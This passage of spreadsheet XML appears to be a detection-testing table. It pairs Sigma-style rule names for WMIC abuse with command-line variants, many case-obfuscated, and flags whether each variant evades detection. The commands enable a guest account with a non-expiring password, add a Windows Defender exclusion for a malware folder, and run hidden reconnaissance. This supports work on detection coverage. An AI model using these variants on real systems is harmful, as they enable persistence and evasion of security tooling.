      </c>
      <c r="H1330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1330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30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1330" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1331" ht="15.75" customHeight="1" s="42">
      <c r="A1331" s="43" t="n"/>
      <c r="B1331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1331" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1331" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1331" s="44" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" -"expires:never" -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F1331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1331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331" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1331" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1332" ht="15.75" customHeight="1" s="42">
      <c r="A1332" s="43" t="n"/>
      <c r="B1332" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1332" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1332" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1332" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:Yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F1332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1332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32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1333" ht="15.75" customHeight="1" s="42">
      <c r="A1333" s="43" t="n"/>
      <c r="B1333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1333" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1333" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1333" s="44" t="inlineStr">
        <is>
          <t>net user guest /aCtIve:yeS /expires:never /PASSworDChg:No</t>
        </is>
      </c>
      <c r="F1333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1333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33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1334" ht="15.75" customHeight="1" s="42">
      <c r="A1334" s="43" t="n"/>
      <c r="B1334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1334" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1334" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1334" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F1334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1334" s="43" t="n"/>
      <c r="J1334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1334" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1335" ht="15.75" customHeight="1" s="42">
      <c r="A1335" s="43" t="n"/>
      <c r="B1335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1335" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1335" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1335" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F1335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1335" s="44" t="n"/>
      <c r="J1335" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1335" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1336" ht="15.75" customHeight="1" s="42">
      <c r="A1336" s="43" t="n"/>
      <c r="B1336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1336" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1336" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1336" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F1336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1336" s="44" t="n"/>
      <c r="J1336" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1336" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1337" ht="15.75" customHeight="1" s="42">
      <c r="A1337" s="43" t="n"/>
      <c r="B1337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1337" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1337" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1337" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAnd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F1337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1337" s="43" t="n"/>
      <c r="J1337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1337" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1338" ht="15.75" customHeight="1" s="42">
      <c r="A1338" s="43" t="n"/>
      <c r="B1338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1338" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1338" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1338" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnD "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F1338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1338" s="43" t="n"/>
      <c r="J1338" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1338" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1339" ht="15.75" customHeight="1" s="42">
      <c r="A1339" s="43" t="n"/>
      <c r="B1339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1339" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1339" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1339" s="44" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F1339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1339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39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1340" ht="15.75" customHeight="1" s="42">
      <c r="A1340" s="43" t="n"/>
      <c r="B1340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1340" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1340" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1340" s="44" t="inlineStr">
        <is>
          <t>net user guest /expiREs:never</t>
        </is>
      </c>
      <c r="F1340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1340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1340" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1340" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1341" ht="15.75" customHeight="1" s="42">
      <c r="A1341" s="43" t="n"/>
      <c r="B1341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1341" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1341" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1341" s="44" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F1341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1341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341" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1341" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1342" ht="15.75" customHeight="1" s="42">
      <c r="A1342" s="43" t="n"/>
      <c r="B1342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1342" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1342" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1342" s="44" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F1342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1342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342" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1342" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1343" ht="15.75" customHeight="1" s="42">
      <c r="A1343" s="43" t="n"/>
      <c r="B1343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1343" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1343" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1343" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1343" s="43" t="n"/>
      <c r="J1343" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1343" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1344" ht="15.75" customHeight="1" s="42">
      <c r="A1344" s="43" t="n"/>
      <c r="B1344" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1344" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1344" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1344" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1344" s="43" t="n"/>
      <c r="J1344" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1344" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1345" ht="15.75" customHeight="1" s="42">
      <c r="A1345" s="43" t="n"/>
      <c r="B1345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1345" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1345" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1345" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1345" s="43" t="n"/>
      <c r="J1345" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1345" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1346" ht="15.75" customHeight="1" s="42">
      <c r="A1346" s="43" t="n"/>
      <c r="B1346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C1346" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1346" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E1346" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F1346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1346" s="43" t="n"/>
      <c r="J1346" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1346" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1347" ht="15.75" customHeight="1" s="42">
      <c r="A1347" s="43" t="n"/>
      <c r="B1347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C1347" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1347" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E1347" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -wiNDOWSTyLe Hidden -c "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F1347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1347" s="43" t="n"/>
      <c r="J1347" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1347" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1348" ht="15.75" customHeight="1" s="42">
      <c r="A1348" s="43" t="n"/>
      <c r="B1348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C1348" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1348" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E1348" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F1348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1348" s="43" t="n"/>
      <c r="J1348" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1348" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1349" ht="15.75" customHeight="1" s="42">
      <c r="A1349" s="43" t="n"/>
      <c r="B1349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C1349" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1349" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E1349" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOPRoFILE -winDoWSTyLE Hidden -c "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F1349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1349" s="43" t="n"/>
      <c r="J1349" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1349" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1350" ht="15.75" customHeight="1" s="42">
      <c r="A1350" s="43" t="n"/>
      <c r="B1350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C1350" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1350" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E1350" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -noPRoFIlE -WIndoWstyLe Hidden -c "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F1350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1350" s="43" t="n"/>
      <c r="J1350" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1350" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1351" ht="15.75" customHeight="1" s="42">
      <c r="A1351" s="43" t="n"/>
      <c r="B1351" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C1351" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1351" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E1351" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F1351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1351" s="43" t="n"/>
      <c r="J1351" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1351" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1352" ht="15.75" customHeight="1" s="42">
      <c r="A1352" s="43" t="n"/>
      <c r="B1352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C1352" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1352" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E1352" s="44" t="inlineStr">
        <is>
          <t>powershell -nopRoFIle -COMmaNd "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F1352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1352" s="43" t="n"/>
      <c r="J1352" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1352" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1353" ht="15.75" customHeight="1" s="42">
      <c r="A1353" s="43" t="n"/>
      <c r="B1353" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C1353" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1353" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E1353" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -CoMMand "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F1353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1353" s="43" t="n"/>
      <c r="J1353" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1353" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1354" ht="15.75" customHeight="1" s="42">
      <c r="A1354" s="43" t="n"/>
      <c r="B1354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C1354" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1354" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E1354" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProFIle -COmmaND "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F1354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1354" s="43" t="n"/>
      <c r="J1354" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1354" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1355" ht="15.75" customHeight="1" s="42">
      <c r="A1355" s="43" t="n"/>
      <c r="B1355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C1355" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1355" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E1355" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -c "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F1355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1355" s="43" t="n"/>
      <c r="J1355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1355" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1356" ht="15.75" customHeight="1" s="42">
      <c r="A1356" s="43" t="n"/>
      <c r="B1356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C1356" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1356" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E1356" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-HotFix"</t>
        </is>
      </c>
      <c r="F1356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1356" s="43" t="n"/>
      <c r="J1356" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1356" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1357" ht="15.75" customHeight="1" s="42">
      <c r="A1357" s="43" t="n"/>
      <c r="B1357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C1357" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1357" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E1357" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-HotFix"</t>
        </is>
      </c>
      <c r="F1357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1357" s="43" t="n"/>
      <c r="J1357" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1357" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1358" ht="15.75" customHeight="1" s="42">
      <c r="A1358" s="43" t="n"/>
      <c r="B1358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C1358" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1358" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E1358" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Get-HotFix"</t>
        </is>
      </c>
      <c r="F1358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1358" s="43" t="n"/>
      <c r="J1358" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1358" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1359" ht="15.75" customHeight="1" s="42">
      <c r="A1359" s="43" t="n"/>
      <c r="B1359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C1359" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1359" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E1359" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaND "Get-HotFix"</t>
        </is>
      </c>
      <c r="F1359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1359" s="43" t="n"/>
      <c r="J1359" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1359" s="44" t="b">
        <v>1</v>
      </c>
